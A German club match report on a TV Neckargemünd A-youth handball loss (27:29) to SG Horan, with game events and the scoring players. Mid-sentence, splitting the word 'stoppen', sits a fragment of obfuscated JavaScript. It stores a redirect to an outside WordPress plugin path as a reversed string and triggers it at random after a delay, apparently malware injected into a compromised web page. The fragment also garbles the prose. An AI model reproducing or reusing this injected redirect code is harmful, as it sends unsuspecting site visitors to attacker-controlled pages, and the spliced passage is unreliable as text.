Die Niederlagen-Serie wollte leider auch im Spiel der männlichen A-Jugend des TV Neckargemünd gegen die Hockenheimer einfach nicht abbrechen. Beide Mannschaften wirkten bemüht aber auch unkonzentriert. Immer wieder kam es bei beiden Mannschaften zu unkoordinierten Handlungen und Fehlpässen. (TVN – SG Horan – 27 : 29 ( 11 : 10))
Neckargemünd, den 16.10.16 (ama) – Nach knapp 3 Minuten fiel beim Heimspiel das erste Tor durch die Hockenheimer. Dann ging die Führung bis zur Halbzeit ständig zwischen den Mannschaften hin und her. In der ersten Halbzeit wurden bereits zwei 2-Minuten-Strafen, jeweils eine pro Mannschaft, ausgesprochen und der TVN hatte drei 7m-Chancen, wovon leider nur eine in ein Tor umgewandelt werden konnte.Dennoch konnte der TVN zumindest die erste Halbzeit mit einem 11:10 für sich entscheiden.
Die regelmäßig auftauchenden Probleme in der Abwehr zwangen beide Mannschaften dazu, den Gegner ggf. auch direkt vor dem Tor unsanft zu stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toppen. Das führte in der zweiten Halbzeit zu insgesamt sieben 7m-Entscheidungen des Schiedsrichters. Als Felix nach einem Fehlpass des TVN schließlich den Gegner gerade noch vor dem Tor ausbremsen konnte, quittierte das der Schiedsrichter sogar mit einer roten Karte. Kaum eine Minute später wurde auch das gegnerische Opfer zum Täter und wurde ebenfalls vom Schiedsrichter disqualifiziert.
Lediglich die Präzision bei den Pässen und mehr Sicherheit bei den 7m-Würfen hätten dieses Spiel zugunsten des TVN entscheiden können. Dennoch: Es ist das 1. Jahr in der A-Jugend. Und es war klar, dass hier der Gegenwind deutlich stärker werden würde als in der B-Jugend.
Es spielten:
Niklas und Tobias im Tor, Till (9), Sebastian (8), Felix (2), Timothy (2), Samuel (2), Nicolas (1), Emil (1), Johannes, Philipp, Tom.